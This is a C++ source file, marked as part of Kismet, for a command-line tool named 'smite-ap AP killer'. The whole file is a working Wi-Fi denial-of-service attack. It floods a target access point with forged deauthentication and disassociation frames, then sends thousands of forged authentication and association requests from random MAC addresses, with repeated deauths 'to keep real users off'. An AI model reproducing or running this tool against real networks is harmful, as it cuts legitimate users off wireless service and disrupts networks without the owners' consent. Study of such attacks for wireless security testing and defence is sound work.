/*
    This file is part of Kismet

    Kismet is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    Kismet is distributed in the hope that it will be useful,
      but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with Kismet; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#include "config.h"

/* According to POSIX 1003.1-2001 */
#include <sys/select.h>

/* According to earlier standards */
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include "getopt.h"

#include "messagebus.h"
#include "util.h"
#include "ifcontrol.h"
#include "iwcontrol.h"
#include "hostapcontrol.h"
#include "packetforge.h"

typedef struct config {
    uint8_t bssid[6];
    int bssid_set;
    uint8_t source[6];
    int source_set;
    unsigned int channel;
    char ssid[32];
    int ssid_set;
    char interface[32];
    int interface_set;
    unsigned int wep;
};

void Usage(char *argv) {
    printf("smite-ap AP killer\n"
           "%s -i interface -b bssid -c channel -S ssid [ -s source ]\n"
           "   [-w [0|1] ]\n\n", argv);
    exit(1);
}

int ParseConfig(int argc, char *argv[], MessageBus *msgbus, config *ret_conf) {
    // Getopt long options
    static struct option long_options[] = {   /* options table */
        { "interface", required_argument, 0, 'i' },
        { "bssid", required_argument, 0, 'b' },
        { "source", required_argument, 0, 's' },
        { "channel", required_argument, 0, 'c' },
        { "ssid", required_argument, 0, 'S' },
        { "wep", required_argument, 0, 'w' },
        { 0, 0, 0, 0 }
    };
    int option_index;
    char errstr[1024];
    unsigned int temp_mac[6];

    ret_conf->bssid_set = 0;
    ret_conf->source_set = 0;
    ret_conf->channel = 0;
    ret_conf->ssid_set = 0;
    ret_conf->interface_set = 0;
    ret_conf->wep = 0;

    while(1) {
        int r = getopt_long(argc, argv, "i:b:c:S:s:w:", 
                            long_options, &option_index);

        if (r < 0)
            break;

        switch(r) {
            case 'i':
                strncpy(ret_conf->interface, optarg, 32);
                ret_conf->interface_set = 1;
                break;
            case 'S':
                strncpy(ret_conf->ssid, optarg, 32);
                ret_conf->ssid_set = 1;
                break;
            case 'b':
                if (sscanf(optarg, "%x:%x:%x:%x:%x:%x",
                           &temp_mac[0], &temp_mac[1], &temp_mac[2],
                           &temp_mac[3], &temp_mac[4], &temp_mac[5]) < 6) {
                    snprintf(errstr, 1024, "Invalid BSSID MAC '%s'", optarg);
                    msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
                    Usage(argv[0]);
                }

                for (unsigned int x = 0; x < 6; x++)
                    ret_conf->bssid[x] = temp_mac[x] & 0xFF;

                ret_conf->bssid_set = 1;
                break;
            case 's':
                if (sscanf(optarg, "%x:%x:%x:%x:%x:%x",
                           &temp_mac[0], &temp_mac[1], &temp_mac[2],
                           &temp_mac[3], &temp_mac[4], &temp_mac[5]) < 6) {
                    snprintf(errstr, 1024, "Invalid source MAC '%s'", optarg);
                    msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
                    Usage(argv[0]);
                }

                for (unsigned int x = 0; x < 6; x++)
                    ret_conf->source[x] = temp_mac[x] & 0xFF;

                ret_conf->source_set = 1;
                break;
            case 'c':
                if (sscanf(optarg, "%u", &(ret_conf->channel)) != 1) {
                    snprintf(errstr, 1024, "Invalid channel '%s'", optarg);
                    msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
                    Usage(argv[0]);
                }
                break;
            case 'w':
                if (sscanf(optarg, "%u", &(ret_conf->wep)) != 1) {
                    snprintf(errstr, 1024, "Invalid WEP option '%s'", optarg);
                    msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
                    Usage(argv[0]);
                }
                break;
            default:
                Usage(argv[0]);
                break;
        }
                    
    }

    if (ret_conf->ssid_set == 0) {
        snprintf(errstr, 1024, "No SSID given.");
        msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
        Usage(argv[0]);
    }

    if (ret_conf->interface_set == 0) {
        snprintf(errstr, 1024, "No interface given.");
        msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
        Usage(argv[0]);
    }

    if (ret_conf->bssid_set == 0) {
        snprintf(errstr, 1024, "No bssid given.");
        msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
        Usage(argv[0]);
    }

    if (ret_conf->channel == 0) {
        snprintf(errstr, 1024, "No channel given.");
        msgbus->InjectMessage(errstr, MSGFLAG_FATAL);
        Usage(argv[0]);
    }

    return 1;
}

int main(int argc, char *argv[]) {
    //  Important stuff
    MessageBus msgbus;
    StdoutMessageClient stdmsgcli;
    msgbus.RegisterClient(&stdmsgcli, MSGFLAG_ALL);

    // struct timeval ms;
    int sock;
    char errstr[1024];
    config conf;

    ParseConfig(argc, argv, &msgbus, &conf);
    
    // Set the channel
    if (Iwconfig_Set_Channel(conf.interface, conf.channel, errstr) < 0) {
        msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
        exit(1);
    }

    // Create a raw socket
    if ((sock = HostAPCreateRawSock(conf.interface, errstr)) < 0) {
        msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
        exit(1);
    }
    
    // Create the disassoc frames
    uint8_t *deauth_frame;
    int deauth_len;
    deauth_len = PacketForgeDeauth(conf.bssid, NULL, NULL, &deauth_frame);

    uint8_t *dis_frame;
    int dis_len;
    dis_len = PacketForgeDisassoc(conf.bssid, NULL, NULL, &dis_frame);

    // Flood the users off the network
    for (unsigned int x = 0; x < 25; x++) {
        if (HostAPWriteFrame(sock, deauth_frame, deauth_len, errstr) < 0) {
            msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
            exit(1);
        }

        if (HostAPWriteFrame(sock, dis_frame, dis_len, errstr) < 0) {
            msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
            exit(1);
        }
    }

    // Then flood the network with associations
    for (unsigned int  x = 0; x < 2000; x++) {
        uint8_t *auth_frame;
        int auth_len;
        uint8_t *assoc_frame;
        int assoc_len;

        if (conf.source_set == 0)
            PacketForgeCreateRandmac(conf.source);

        auth_len = PacketForgeAuth(conf.source, conf.bssid, &auth_frame);
        assoc_len = PacketForgeAssocReq(conf.bssid, conf.source, 
                                        conf.ssid, conf.wep, &assoc_frame);

        if (HostAPWriteFrame(sock, auth_frame, auth_len, errstr) < 0) {
            msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
            exit(1);
        }
        // Do a microsleep
        /*
        ms.tv_sec = 0;
        ms.tv_usec = 100000;
        select(0, NULL, NULL, NULL, &ms);
        */

        if (HostAPWriteFrame(sock, assoc_frame, assoc_len, errstr) < 0) {
            msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
            exit(1);
        }

        // Do a microsleep
        /*
        ms.tv_sec = 0;
        ms.tv_usec = 100000;
        select(0, NULL, NULL, NULL, &ms);
        */

        // Deauth and disassoc them now and then too to keep real users off
        if ((x % 25) == 0) {
            for (int y = 0; y < 10; y++) {
                if (HostAPWriteFrame(sock, deauth_frame, deauth_len, errstr) < 0) {
                    msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
                    exit(1);
                }

                if (HostAPWriteFrame(sock, dis_frame, dis_len, errstr) < 0) {
                    msgbus.InjectMessage(errstr, MSGFLAG_FATAL);
                    exit(1);
                }
            }

            // Do a microsleep
            /*
            ms.tv_sec = 0;
            ms.tv_usec = 100000;
            select(0, NULL, NULL, NULL, &ms);
            */
        }
        
        delete[] auth_frame;
        delete[] assoc_frame;
    }

    delete[] dis_frame;
    delete[] deauth_frame;
    
    exit(0);
}

